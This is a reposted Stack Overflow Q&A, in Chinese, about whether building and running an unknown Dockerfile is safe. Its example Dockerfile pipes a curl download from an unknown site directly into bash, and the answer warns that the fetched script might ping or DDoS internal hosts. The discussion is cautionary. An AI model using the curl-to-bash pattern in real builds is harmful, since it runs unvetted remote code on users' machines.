gpt4 book ai didi

docker - 构建未知的Dockerfile是否安全?

转载 作者:行者123 更新时间:2023-12-02 18:13:09 24 4
gpt4 key购买 nike

假设您有一个未知的Dockerfile,其中包含一行或多行您不太了解的代码。

例:

FROM ubuntu
RUN curl --silent "https://some-unknown-website.io" | bash

问题:
  • 构建此Dockerfile安全吗?
  • 如果是这样,运行生成的镜像是否安全?

  • 我认为即使建筑也不安全,但是今天互联网上的用户回答了我

    Since Dockerfile is a plain text and you can read it, it is actually not unknown (and thus safe).



    尽管我认为这是一个基本问题,但像“是否是未知的dockerfile是安全的”或“正在构建第三方dockerfile是安全的”这样的谷歌搜索并没有给出很好的结果。所以我在这里张贴。

    最佳答案

    这取决于您对safe的看法。

    对于您的情况,如果"https://some-unknown-website.io"是bash脚本,其内容例如是ping 10.192.244.226

    然后,在dockerfile上面可能与下一个相同:

    FROM debian:10
    RUN ping 10.192.244.226

    当您构建它时,它将永远对您网络中的一台本地计算机执行ping操作,然后,如果它不是 ping,而仅仅是 ddos attack呢?

    关于docker - 构建未知的Dockerfile是否安全?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/62190019/

    24 4 0
    Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
    广告合作:1813099741@qq.com 6ren.com